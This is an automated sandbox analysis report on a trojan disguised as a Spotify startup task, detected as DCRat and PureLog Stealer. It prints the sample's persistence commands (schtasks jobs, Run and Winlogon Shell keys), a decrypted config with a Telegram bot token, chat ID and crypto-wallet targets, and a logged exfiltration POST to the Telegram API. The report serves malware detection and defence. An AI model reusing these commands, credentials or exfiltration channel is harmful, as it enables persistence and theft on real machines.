Windows Analysis Report
SpotifyStartupTask.exe

Overview

General Information

Sample name: SpotifyStartupTask.exe
Analysis ID: 1639975
MD5: 9939a508443b50f3065506b3ef554c79
SHA1: 5fae3003ff7f0930e51acad3d3f0cff25035c3ee
SHA256: 2604fc4de987995cbc77b46bf86d49466fb65dd7dbee6b1b89fe343ef9b97617
Tags: exe, user-BastianHein

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SpotifyStartupTask.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\SpotifyStartupTask.exe" MD5: 9939A508443B50F3065506B3EF554C79)
    • schtasks.exe (PID: 5768 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1596 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZ" /sc ONLOGON /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1532 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 708 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 6908 cmdline: schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5996 cmdline: schtasks.exe /create /tn "dxLy2s6A" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2740 cmdline: schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4872 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1532 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJ" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1528 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\DiagTrack\dwm.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7064 cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1692 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5776 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 992 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1528 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6928 cmdline: schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1692 cmdline: schtasks.exe /create /tn "SpotifyStartupTask" /sc ONLOGON /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2228 cmdline: schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7584 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7604 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dwm.exe (PID: 4352 cmdline: C:\Windows\DiagTrack\dwm.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • dwm.exe (PID: 2432 cmdline: C:\Windows\DiagTrack\dwm.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • dxLy2s6A.exe (PID: 992 cmdline: "C:\Program Files (x86)\google\Update\dxLy2s6A.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • dxLy2s6A.exe (PID: 7192 cmdline: "C:\Program Files (x86)\google\Update\dxLy2s6A.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • JNXeqwRJ1WmUZ.exe (PID: 7208 cmdline: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • JNXeqwRJ1WmUZ.exe (PID: 7232 cmdline: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • PQ4HCWgZazguIsFyU1PhJ.exe (PID: 7244 cmdline: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • PQ4HCWgZazguIsFyU1PhJ.exe (PID: 7264 cmdline: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • SpotifyStartupTask.exe (PID: 7280 cmdline: C:\Users\user\Desktop\SpotifyStartupTask.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • SpotifyStartupTask.exe (PID: 7292 cmdline: C:\Users\user\Desktop\SpotifyStartupTask.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • winlogon.exe (PID: 7304 cmdline: "C:\Program Files\7-Zip\Lang\winlogon.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • winlogon.exe (PID: 7320 cmdline: "C:\Program Files\7-Zip\Lang\winlogon.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • cleanup
No configs have been found
Source | Rule | Description | Author
SpotifyStartupTask.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
SpotifyStartupTask.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Windows\DiagTrack\dwm.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\DiagTrack\dwm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(5 further entries not shown)

Source | Rule | Description | Author
0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
(4 further entries not shown)

Source | Rule | Description | Author
0.0.SpotifyStartupTask.exe.600000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.SpotifyStartupTask.exe.600000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetFilename: C:\Program Files\7-Zip\Lang\winlogon.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Windows\DiagTrack\dwm.exe, CommandLine: C:\Windows\DiagTrack\dwm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\DiagTrack\dwm.exe, NewProcessName: C:\Windows\DiagTrack\dwm.exe, OriginalFileName: C:\Windows\DiagTrack\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\DiagTrack\dwm.exe, ProcessId: 4352, ProcessName: dwm.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JNXeqwRJ1WmUZ
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", ProcessId: 708, ProcessName: csc.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetFilename: C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline
Source: Process started | Author: vburov | Data: Command: "C:\Program Files\7-Zip\Lang\winlogon.exe", CommandLine: "C:\Program Files\7-Zip\Lang\winlogon.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\7-Zip\Lang\winlogon.exe, NewProcessName: C:\Program Files\7-Zip\Lang\winlogon.exe, OriginalFileName: C:\Program Files\7-Zip\Lang\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: "C:\Program Files\7-Zip\Lang\winlogon.exe", ProcessId: 7304, ProcessName: winlogon.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", ProcessId: 708, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, ProcessId: 5776, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-16T19:42:21.970604+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49699 | 104.21.33.71 | 80 | TCP
2025-03-16T19:42:10.749406+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49694 | 34.117.59.81 | 443 | TCP
2025-03-16T19:42:26.986057+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49709 | 34.117.59.81 | 443 | TCP
2025-03-16T19:42:11.879401+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49695 | 149.154.167.220 | 443 | TCP
2025-03-16T19:42:28.006474+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49711 | 149.154.167.220 | 443 | TCP

AV Detection

Source: SpotifyStartupTask.exe | Avira: detected
Source: http://009383cm.nyashk.ru/ | Avira URL Cloud: Label: malware
Source: http://009383cm.nyashk.ru | Avira URL Cloud: Label: malware
Source: http://009383cm.nyashk.ru/geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\vRRUHqel.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Windows\DiagTrack\dwm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\Rlqiwetw.log | Avira: detection malicious, Label: TR/Spy.xaclu
Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\7-Zip\Lang\winlogon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\clyyMyKw.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\sMvnZGVS.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\GFwKqCZT.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\LWyBOcEb.log | Avira: detection malicious, Label: TR/Spy.xaclu
Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe | ReversingLabs: Detection: 66%
Source: C:\Program Files\7-Zip\Lang\winlogon.exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\DUQujoOa.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\GFwKqCZT.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\PMosVZFV.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XUwHpYfn.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\YqxhFSUC.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\clyyMyKw.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\eKApnDyW.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\sMvnZGVS.log | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\vRRUHqel.log | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\wcHMhvIM.log | ReversingLabs: Detection: 25%
Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe | ReversingLabs: Detection: 66%
Source: C:\Windows\DiagTrack\dwm.exe | ReversingLabs: Detection: 66%
Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe | ReversingLabs: Detection: 66%
Source: SpotifyStartupTask.exe | Virustotal: Detection: 69%
Source: SpotifyStartupTask.exe | ReversingLabs: Detection: 66%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                              Source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"TelegramNotifer":{"chatid":"6289890180","bottoken":"7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"}}
                              Source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-lyFL9C96UdpRArWkuUmQ","0","????????+??????????","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: SpotifyStartupTask.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | Directory created: C:\Program Files\7-Zip\Lang\winlogon.exe
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | Directory created: C:\Program Files\7-Zip\Lang\cc11b995f2a76d
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: SpotifyStartupTask.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2482149517.000000001BB76000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.pdb source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SpotifyStartupTask.exe | File opened: C:\Users\user\AppData\Local\Temp

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49699 -> 104.21.33.71:80
Source: Network traffic | Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49695 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49711 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.6:65107 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="f6bf5325-8482-421f-8ece-01a42d055ef4" | Host: api.telegram.org | Content-Length: 82070 | Expect: 100-continue | Connection: Keep-Alive
